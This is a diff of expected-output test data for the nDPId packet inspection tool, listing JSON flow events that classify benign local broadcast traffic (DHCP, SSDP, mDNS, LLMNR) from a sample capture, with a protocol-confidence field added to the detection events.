-00719{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"joanna-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}}
+00745{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397091,"flow_last_seen":1470104397091,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1470104397091,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"joanna-pc","fingerprint":"1,15,3,6,44,46,47,31,33,121,249,43,252","class_ident":"MSFT 5.0"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00617{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1470104397807,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1470104397807,"pkt":"AQBef\/\/6bEAIlAI6CABFAAClrzIAAAERVEPAqAUw7\/\/\/+sIlB2wAkY1JTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDogMjM5LjI1NS4yNTUuMjUwOjE5MDANClNUOiB1cm46c2NoZW1hcy11cG5wLW9yZzpkZXZpY2U6SW50ZXJuZXRHYXRld2F5RGV2aWNlOjENCk1hbjogInNzZHA6ZGlzY292ZXIiDQpNWDogMw0KDQo="}
-00611{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104397807,"flow_last_seen":1470104397807,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1470104397807,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":49701,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1470104398314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1470104398314,"pkt":"TF4M6gNlYMVHBbyMCABFAAAoA95AAEAGLsvAqAUQROn9hdFlAFAG4xw4xV6fSlAUEAE+LgAA8Q52cgJF"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1470104398832,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1470104398832,"pkt":"AQBeAAD7ZMwunDzJCABFAABEo69AAP8RMRXAqAVA4AAA+xTpFOkAMOS\/AAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="}
-00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398832,"flow_last_seen":1470104398832,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104398832,"l3_proto":"ip4","src_ip":"192.168.5.64","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}}
 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104398932,"flow_last_seen":1470104398932,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1470104398932,"l3_proto":"ip4","src_ip":"192.168.2.186","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1470104398932,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1470104398932,"pkt":"\/\/\/\/\/\/\/\/AAK2Qbs6CABFAABEAABAAEARd0fAqAK6\/\/\/\/\/4AAB5sAMBr8aWNSVlNvVTlBQUJYWldKRFlXeHNBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1470104399652,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1470104399652,"pkt":"AQBeAAD8bEAIlAI6CABFAAA4QZsAAAER0UXAqAUw4AAA\/OmVFOsAJO3eTL0AAAABAAAAAAAACkthc3Blci1tYWMAAP8AAQ=="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":820,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399652,"flow_last_seen":1470104399652,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1470104399652,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"224.0.0.252","src_port":59797,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1470104399854,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00577{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1470104399854,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"ts_msec":1470104399854,"pkt":"\/\/\/\/\/\/\/\/TF4M6gOICABFAACAAABAAEAReWHAqABk\/\/\/\/\/8btFi4AbOgXAACpHQABAAZMXgzqA4gABQAFNE1OQVQABwAPNi4zNS4xIChzdGFibGUpAAgACE1pa3JvVGlrAAoABIOWJAAACwAJTjUzOC1HMDRVAAwABlJCNDUwRwAOAAEAABAABmV0aGVyMg=="}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1470104399958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104399958,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MRAAAAER4cnAqAU54AAA\/P5+FOsAIr4lNLsAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":825,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399958,"flow_last_seen":1470104399958,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1470104399958,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"224.0.0.252","src_port":65150,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1470104399959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":91,"pkt_l4_len":37,"ts_msec":1470104399959,"pkt":"MzMAAQADuKxv2MGbht1gAAAAACURAf6AAAAAAAAA4DQHvtj5YZf\/AgAAAAAAAAAAAAAAAQAD9SQU6wAlorgrvQAAAAEAAAAAAAALY2hhcm1pbmctUEMAAP8AAQ=="}
-00615{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":826,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104399959,"l3_proto":"ip6","src_ip":"fe80::e034:7be:d8f9:6197","dst_ip":"ff02::1:3","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1470104399959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1470104399959,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S7YAAAERxyfAqAUy4AAA\/PUkFOsAJRvtK70AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="}
-00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1470104400059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1470104400059,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MRIAAAER4cfAqAU54AAA\/P5+FOsAIr4lNLsAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1470104400059,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"ts_msec":1470104400059,"pkt":"AQBeAAD8bEAIlAI6CABFAAA4rMMAAAERZh3AqAUw4AAA\/OmVFOsAJO3eTL0AAAABAAAAAAAACkthc3Blci1tYWMAAP8AAQ=="}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":180000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01130{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1470104400162,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":562,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":562,"pkt_l4_len":528,"ts_msec":1470104400162,"pkt":"AQBef\/\/66LH8q\/uyCABFAAIkCfEAAAQR9QTAqAUx7\/\/\/+gdsB2wCELIPTk9USUZZICogSFRUUC8xLjENCkhvc3Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpOVDogdXJuOm1pY3Jvc29mdC5jb206c2VydmljZTpYX01TX01lZGlhUmVjZWl2ZXJSZWdpc3RyYXI6MQ0KTlRTOiBzc2RwOmFsaXZlDQpMb2NhdGlvbjogaHR0cDovLzE5Mi4xNjguNS40OToyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6OTMxOTM5NWEtNGQwMy00NzUwLWJiMWItNDY2MzkzM2FiODEyDQpVU046IHV1aWQ6OTMxOTM5NWEtNGQwMy00NzUwLWJiMWItNDY2MzkzM2FiODEyOjp1cm46bWljcm9zb2Z0LmNvbTpzZXJ2aWNlOlhfTVNfTWVkaWFSZWNlaXZlclJlZ2lzdHJhcjoxDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTkwMA0KU2VydmVyOiBNaWNyb3NvZnQtV2luZG93cy8xMC4wIFVQblAvMS4wIFVQblAtRGV2aWNlLUhvc3QvMS4wDQpPUFQ6Imh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7IG5zPTAxDQowMS1OTFM6IGQwN2I0MzVkMjk5YjQxNzg0Y2EzZDJhZTJiOTU5OTQ4DQoNCg=="}
-00610{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":180000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":180000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":180000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1470104400162,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":590,"pkt_l4_len":536,"ts_msec":1470104400162,"pkt":"MzMAAAAM6LH8q\/uyht1gAAAAAhgRBP6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAAAMB2wHbAIYYQNOT1RJRlkgKiBIVFRQLzEuMQ0KSG9zdDogW0ZGMDI6OkNdOjE5MDANCk5UOiB1cm46bWljcm9zb2Z0LmNvbTpzZXJ2aWNlOlhfTVNfTWVkaWFSZWNlaXZlclJlZ2lzdHJhcjoxDQpOVFM6IHNzZHA6YWxpdmUNCkxvY2F0aW9uOiBodHRwOi8vW2ZlODA6OjliZDo4MWRkOjJmZGM6NTc1MF06Mjg2OS91cG5waG9zdC91ZGhpc2FwaS5kbGw\/Y29udGVudD11dWlkOjkzMTkzOTVhLTRkMDMtNDc1MC1iYjFiLTQ2NjM5MzNhYjgxMg0KVVNOOiB1dWlkOjkzMTkzOTVhLTRkMDMtNDc1MC1iYjFiLTQ2NjM5MzNhYjgxMjo6dXJuOm1pY3Jvc29mdC5jb206c2VydmljZTpYX01TX01lZGlhUmVjZWl2ZXJSZWdpc3RyYXI6MQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT05MDANClNlcnZlcjogTWljcm9zb2Z0LVdpbmRvd3MvMTAuMCBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOiBkMDdiNDM1ZDI5OWI0MTc4NGNhM2QyYWUyYjk1OTk0OA0KDQo="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":180000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":180000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
